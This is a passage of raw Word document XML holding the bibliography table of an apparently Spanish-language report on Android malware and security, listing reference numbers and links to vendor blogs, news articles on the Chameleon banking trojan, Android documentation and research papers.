            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId78" w:history="1">
              <w:r w:rsidR="008F2703">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                  <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>https://www.cs.tufts.edu/comp/116/archive/fall2017/tzhu.pdf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008F2703">
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F2703" w:rsidRPr="00362542" w14:paraId="003CF087" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C4FDD7C" w14:textId="77777777" w:rsidR="008F2703" w:rsidRDefault="008F2703">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[3]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D4459D7" w14:textId="77777777" w:rsidR="008F2703" w:rsidRDefault="008F2703" w:rsidP="008F2703">
            <w:r>
              <w:t>[4]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461345DC" w14:textId="77777777" w:rsidR="008F2703" w:rsidRDefault="008F2703" w:rsidP="008F2703">
            <w:r>
              <w:t>[5]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A615C93" w14:textId="77777777" w:rsidR="008E36DB" w:rsidRDefault="008E36DB" w:rsidP="008F2703"/>
          <w:p w14:paraId="5781F94C" w14:textId="6619E48A" w:rsidR="008F2703" w:rsidRPr="008F2703" w:rsidRDefault="008F2703" w:rsidP="008F2703">
            <w:r>
              <w:t>[6]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C18EA7" w14:textId="77777777" w:rsidR="008F2703" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId79" w:history="1">
              <w:r w:rsidR="00046A62">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                  <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>https://f-droid.org/es/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4AEF523D" w14:textId="77777777" w:rsidR="006E0F0A" w:rsidRDefault="00000000" w:rsidP="006E0F0A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId80" w:history="1">
              <w:r w:rsidR="00B82DA3" w:rsidRPr="00951301">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.kaspersky.com/blog/malware-in-google-play-2023/49579/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="750BF098" w14:textId="77777777" w:rsidR="008E36DB" w:rsidRDefault="00000000" w:rsidP="006E0F0A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId81" w:history="1">
              <w:r w:rsidR="008E36DB" w:rsidRPr="00951301">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developers.google.com/android/play-protect/potentially-harmful-applications</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3045C901" w14:textId="5A2077A2" w:rsidR="008E36DB" w:rsidRPr="006E0F0A" w:rsidRDefault="00000000" w:rsidP="006E0F0A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId82" w:history="1">
              <w:r w:rsidR="00C57CC5" w:rsidRPr="00951301">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://source.android.com/docs/core/permissions/privacy-indicators</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C57CC5">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="637C2C99" w14:textId="77777777" w:rsidR="00EB7D44" w:rsidRDefault="00EB7D44">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="482"/>
        <w:gridCol w:w="8335"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F2703" w:rsidRPr="00362542" w14:paraId="2F048C0A" w14:textId="77777777" w:rsidTr="00EB7D44">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6C60DA" w14:textId="6787E57F" w:rsidR="008F2703"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r>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>[7]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2233E232" w14:textId="3B7952AF" w:rsidR="00A03BEA" w:rsidRDefault="00C57CC5" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[8]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A321C4" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[9]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361FE65D" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="06DB941E" w14:textId="77777777" w:rsidR="00C57CC5" w:rsidRDefault="00C57CC5" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[10]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B5B8C7" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="11592047" w14:textId="2337FD0B" w:rsidR="00A03BEA" w:rsidRDefault="007E3358" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[11]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21313F68" w14:textId="77777777" w:rsidR="00B02397" w:rsidRDefault="00B02397" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[12]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21463F81" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="431F2CCA" w14:textId="77777777" w:rsidR="00B02397" w:rsidRDefault="00B02397" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[13]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3840501E" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="67E12A44" w14:textId="77777777" w:rsidR="00B02397" w:rsidRDefault="00B02397" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[14]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E6EE66" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="2C7E7BCD" w14:textId="77777777" w:rsidR="00B02397" w:rsidRDefault="00B02397" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[15]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028AEC0D" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="7FF123FC" w14:textId="77777777" w:rsidR="00B02397" w:rsidRDefault="00B02397" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[16]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEF897A" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="7A3E179A" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="2EBC212F" w14:textId="2311BAF5" w:rsidR="00B02397" w:rsidRDefault="00B02397" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[17]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56A8C170" w14:textId="11D577B2" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[18]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5C7683" w14:textId="77777777" w:rsidR="00B02397" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[19]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEED029" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="62EFA35F" w14:textId="77D9B07E" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[20]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5333281E" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="73388454" w14:textId="5DD139DE" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[21]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BCBC747" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="0F2E091E" w14:textId="7460D8EA" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[22]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2514340E" w14:textId="1835FB7C" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[23]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EBC2060" w14:textId="01BAA935" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[24]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47BFAC8C" w14:textId="25332DEB" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="2E198F8F" w14:textId="00945117" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[25]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36534360" w14:textId="414A02B6" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[26]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC40267" w14:textId="20E76F65" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[27]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B6ED358" w14:textId="2022FCA9" w:rsidR="00A03BEA" w:rsidRDefault="00A03BEA" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[28]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CEC7E6" w14:textId="77777777" w:rsidR="00A03BEA" w:rsidRDefault="003B56CE" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[29]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B0BB29" w14:textId="77777777" w:rsidR="003B56CE" w:rsidRDefault="003B56CE" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[30]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138CA375" w14:textId="77777777" w:rsidR="00EF4B01" w:rsidRDefault="00EF4B01" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[31]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095BBE3A" w14:textId="3C0EE1AD" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="58495F03" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[32]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F12242" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="7551123E" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[33]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263A34CD" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="33537A83" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[34]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689A5DB7" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[35]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B37399A" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[36]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA900C9" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[37]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41EC776C" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[38]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6048E32C" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="7C6976B9" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[39]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="393373D6" w14:textId="77777777" w:rsidR="004170C7" w:rsidRDefault="004170C7" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[40]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEEC74F" w14:textId="77777777" w:rsidR="00407D24" w:rsidRDefault="00407D24" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[41]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D8F07D" w14:textId="77777777" w:rsidR="00620974" w:rsidRDefault="00620974" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[42]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B2FCF2" w14:textId="77777777" w:rsidR="00FC7409" w:rsidRDefault="00FC7409" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[43]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D83781" w14:textId="77777777" w:rsidR="004F2B74" w:rsidRDefault="004F2B74" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[44]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094EF509" w14:textId="77777777" w:rsidR="00B772BC" w:rsidRDefault="00B772BC" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[45]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C51F2D4" w14:textId="77777777" w:rsidR="009E5219" w:rsidRDefault="009E5219" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[46]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265B0CF5" w14:textId="77777777" w:rsidR="009E5219" w:rsidRDefault="009E5219" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[47]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61BB87D3" w14:textId="77777777" w:rsidR="009E5219" w:rsidRDefault="009E5219" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[48]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EFBE80B" w14:textId="77777777" w:rsidR="009E5219" w:rsidRDefault="009E5219" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="08105E82" w14:textId="77777777" w:rsidR="009E5219" w:rsidRDefault="009E5219" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[49]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520B7E6E" w14:textId="77777777" w:rsidR="002D0C44" w:rsidRDefault="002D0C44" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[50]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A9E3D02" w14:textId="77777777" w:rsidR="002D0C44" w:rsidRDefault="002D0C44" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[51]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131BD0F2" w14:textId="77777777" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[52]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEA3428" w14:textId="77777777" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[53]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115ED04D" w14:textId="77777777" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="46BFC08D" w14:textId="77777777" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[54]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED9B686" w14:textId="77777777" w:rsidR="0089340B" w:rsidRDefault="0089340B" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[55]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="011EE809" w14:textId="77777777" w:rsidR="00C36DC0" w:rsidRDefault="00C36DC0" w:rsidP="00C57CC5"/>
          <w:p w14:paraId="07E2372A" w14:textId="77777777" w:rsidR="00C36DC0" w:rsidRDefault="00C36DC0" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[56]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416BD8E4" w14:textId="77777777" w:rsidR="00500484" w:rsidRDefault="00500484" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[57]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE41142" w14:textId="47BA03B7" w:rsidR="00500484" w:rsidRPr="00C57CC5" w:rsidRDefault="00500484" w:rsidP="00C57CC5">
            <w:r>
              <w:t>[58]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32ADFF2F" w14:textId="77777777" w:rsidR="00815891" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId83" w:history="1">
              <w:r w:rsidR="00C860DD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                  <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>https://play.google.com/store/apps/details?id=com.google.android.marvin.talkback&amp;hl=en</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="107260B4" w14:textId="0D6DB79F" w:rsidR="00C860DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Bibliography"/>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId84" w:history="1">
              <w:r w:rsidR="001C171C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
                  <w:lang w:val="es-ES" w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>https://stuff.mit.edu/afs/sipb/project/android/docs/guide/topics/admin/device-admin.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5FCE2907" w14:textId="5042DE0C" w:rsidR="007E3358" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId85" w:history="1">
              <w:r w:rsidR="00BA260F" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://cyble.com/blog/chameleon-a-new-android-malware-spotted-in-the-wild/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="59C6793D" w14:textId="2469C0C2" w:rsidR="00C618F8" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId86" w:history="1">
              <w:r w:rsidR="00C618F8" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.bbc.com/news/technology-21860360</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="59AE595B" w14:textId="55899950" w:rsidR="00AC0165" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId87" w:history="1">
              <w:r w:rsidR="00AC0165" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.europapress.es/portaltic/ciberseguridad/noticia-malware-chameleon-bloquea-huella-dactilar-forzar-introduccion-pin-hacerse-cuentas-bancarias-20231229135249.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="06ACC0D6" w14:textId="2D7918A3" w:rsidR="00AC0165" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId88" w:history="1">
              <w:r w:rsidR="00AC0165" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.xatakandroid.com/seguridad/asi-logra-saltarse-biometria-movil-peligroso-troyano-bancario-chameleon</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4CD2487C" w14:textId="27C9F8D5" w:rsidR="000E6EA2" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId89" w:history="1">
              <w:r w:rsidR="000E6EA2" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://newsukraine.rbc.ua/news/android-virus-chameleon-banking-learns-to-1703623824.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4705FA66" w14:textId="5B54B01F" w:rsidR="00066F69" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId90" w:history="1">
              <w:r w:rsidR="00066F69" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.ndss-symposium.org/wp-content/uploads/2018/03/NDSS2018_04A-4_Duan_Slides.pdf</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6EB6CC99" w14:textId="70EF37A1" w:rsidR="00066F69" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId91" w:history="1">
              <w:r w:rsidR="00066F69" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://www.researchgate.net/publication/308180878_Structural_analysis_of_packing_schemes_for_extracting_hidden_codes_in_mobile_malware</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6B9AF9B1" w14:textId="77777777" w:rsidR="00066F69" w:rsidRDefault="00066F69" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24C4CF41" w14:textId="4B1303B1" w:rsidR="00066F69" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId92" w:anchor="obfuscate" w:history="1">
              <w:r w:rsidR="00066F69" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://developer.android.com/build/shrink-code#obfuscate</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="43CA499B" w14:textId="684FA640" w:rsidR="00282F9A" w:rsidRDefault="00000000" w:rsidP="007E3358">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId93" w:history="1">
              <w:r w:rsidR="00282F9A" w:rsidRPr="007D7929">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="es-ES"/>
                </w:rPr>
                <w:t>https://github.com/CalebFenton/simplify</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
